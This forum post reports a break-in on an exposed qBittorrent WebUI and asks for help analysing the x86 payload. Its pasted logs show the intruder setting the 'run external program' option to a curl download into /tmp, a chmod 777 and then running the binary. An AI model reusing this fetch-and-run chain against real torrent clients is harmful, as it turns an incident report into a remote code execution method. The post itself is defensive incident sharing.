So I had my home server's qbittorrent (4.3.5) WebUI exposed externally through UPnP, cause I'm careless, and it got exploited. I'm kind of lost as to why though, the logs only provide enough detail to show that they were able to login directly without brute forcing a password, as there had been no failed logins. I did grep through all the logs.
Exploit went as follows:
1. Successful login from external IP... Somehow...
2. Remove all existing torrents (yay for backed up .torrent files)
3. change "Run external program on torrent completion" to a curl command that downloaded a payload, then add a dummy torrent
4. change external command to chmod 777 the payload, remove and re-add the torrent
5. change external command to the payload itself, remove and re-add
Also they changed the WebUI password just to be a shit.
I'm not exceptionally dumb, and my qbittorrent was not running elevated. I also got lucky; even if it contained some privilege escalation exploit the payload was x86 and I'm running on ARM.
Still kind of concerning that there's some exploit to login without needing the password, since there are many users that access without an ssh tunnel, as that is the default config.
Worth noting maybe is that I have authentication bypassed for the 192.168.1.0/24 subnet, but the connection was from an external IP anyways.
I've redacted some stuff in the log, mainly so nobody goes and downloads the payload themself. If you are skilled in reverse engineering binaries and want to dig into the payload let me know. I'm going to try myself when I have some time anyways, but I'm kinda bad at it.
qbittorrent.log
Code: Select all
(I) 2021-11-13T07:15:03 - UPnP/NAT-PMP: Port mapping successful, message: successfully mapped port using NAT-PMP. external port: TCP/21903
(I) 2021-11-13T07:15:03 - UPnP/NAT-PMP: Port mapping successful, message: successfully mapped port using NAT-PMP. external port: UDP/21903
(I) 2021-11-13T07:15:04 - UPnP/NAT-PMP: Port mapping successful, message: successfully mapped port using NAT-PMP. external port: TCP/8080
(N) 2021-11-13T07:37:04 - WebAPI login success. IP: ::ffff:(redacted external ip)
(N) 2021-11-13T07:37:05 - Web UI: Now listening on IP: *, port: 8080
(N) 2021-11-13T07:37:05 - '(redacted torrent)' was removed from the transfer list.
...
(every torrent gets removed)
...
(N) 2021-11-13T07:37:06 - 'Mina - Discografia 1960-2005 ALL TORRENT (MP3 128-320) TNT Village' added to download list.
(N) 2021-11-13T07:37:22 - Torrent: Mina - Discografia 1960-2005 ALL TORRENT (MP3 128-320) TNT Village, running external program, command: curl http://(redacted ip):8000/i386 --output /tmp/t
(N) 2021-11-13T07:37:27 - Web UI: Now listening on IP: *, port: 8080
(N) 2021-11-13T07:37:27 - 'Mina - Discografia 1960-2005 ALL TORRENT (MP3 128-320) TNT Village' was removed from the transfer list.
(N) 2021-11-13T07:37:28 - 'Mina - Discografia 1960-2005 ALL TORRENT (MP3 128-320) TNT Village' added to download list.
(N) 2021-11-13T07:37:29 - Torrent: Mina - Discografia 1960-2005 ALL TORRENT (MP3 128-320) TNT Village, running external program, command: chmod 777 /tmp/t
(N) 2021-11-13T07:37:49 - Web UI: Now listening on IP: *, port: 8080
(N) 2021-11-13T07:37:49 - 'Mina - Discografia 1960-2005 ALL TORRENT (MP3 128-320) TNT Village' was removed from the transfer list.
(N) 2021-11-13T07:37:50 - 'Mina - Discografia 1960-2005 ALL TORRENT (MP3 128-320) TNT Village' added to download list.
(N) 2021-11-13T07:37:52 - Torrent: Mina - Discografia 1960-2005 ALL TORRENT (MP3 128-320) TNT Village, running external program, command: /tmp/t
Code: Select all
ELF Header:
Magic: 7f 45 4c 46 01 01 01 00 00 00 00 00 00 00 00 00
Class: ELF32
Data: 2's complement, little endian
Version: 1 (current)
OS/ABI: UNIX - System V
ABI Version: 0
Type: EXEC (Executable file)
Machine: Intel 80386
Version: 0x1
Entry point address: 0x80a7020
Start of program headers: 52 (bytes into file)
Start of section headers: 276 (bytes into file)
Flags: 0x0
Size of this header: 52 (bytes)
Size of program headers: 32 (bytes)
Number of program headers: 7
Size of section headers: 40 (bytes)
Number of section headers: 14
Section header string table index: 3